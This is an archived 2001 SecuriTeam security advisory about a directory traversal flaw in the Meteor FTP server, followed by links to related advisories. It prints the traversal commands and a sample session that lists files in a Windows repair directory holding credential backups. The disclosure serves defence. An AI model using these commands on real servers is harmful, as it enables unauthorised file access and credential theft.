[NT] Meteor FTPD Directory Traversal

From: support@securiteam.com
Date: 10/03/01

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Meteor FTPD Directory Traversal
Date: Wed,  3 Oct 2001 23:38:27 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Meteor FTPD Directory Traversal

SUMMARY

 <http://207.202.218.172/> Meteor FTP is a personal FTP server designed
for the Microsoft Windows 98 and Windows Millennium Edition operating
systems. A security vulnerability in the product allows access to
directories stored outside the normal bounding FTP root.

DETAILS

Cartel security team has found a Directory Traversal bug in the meteor FTP
server, allowing remote users to browse through any directory on the
victim's hard drive or list files outside the root directory. This is
possible by sending commands like:
ls ../*
ls /../*
ls .../*

cd ...

Example:
220 Service ready for new user Utilisateur (192.168.160.3:(none)) : nbz
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Meteor FTP Denial of Service (MKD, STOR)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Meteor FTP is a personal FTP server designed ... After a successful logon to the server, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] SalesCart Database Storage Insecurity
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct sockaddr_in sin; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Remote Memory Reading Through TCP/ICMP
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in Linux allows remote attackers to cause the ... remote OS to return chucks of "userland" memory. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] WebSight Directory System Vulnerable to Cross Site Scripting Bug
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WebSight Directory System version 0.1 ... When a user submits a new link (for approving by an administrator), ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Sensitive Information Disclosure Vulnerability Found in SIPS (PHP)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in the product allows attackers to get access to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)